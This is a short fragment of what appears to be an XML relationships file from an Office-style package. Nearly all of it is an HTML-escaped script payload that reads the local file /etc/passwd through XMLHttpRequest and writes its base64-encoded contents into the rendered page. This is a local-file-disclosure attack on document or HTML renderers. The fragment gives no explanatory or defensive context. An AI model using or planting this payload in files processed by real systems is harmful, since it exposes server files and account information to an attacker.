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2cdb7b6aa4cf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&lt;script&gt; x=new XMLHttpRequest; x.onload=function(){document.write(btoa(this.responseText))}; x.open("GET","file:///etc/passwd");x.send(); &lt;/script&gt;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80495925d34429" /></Relationships>
</file>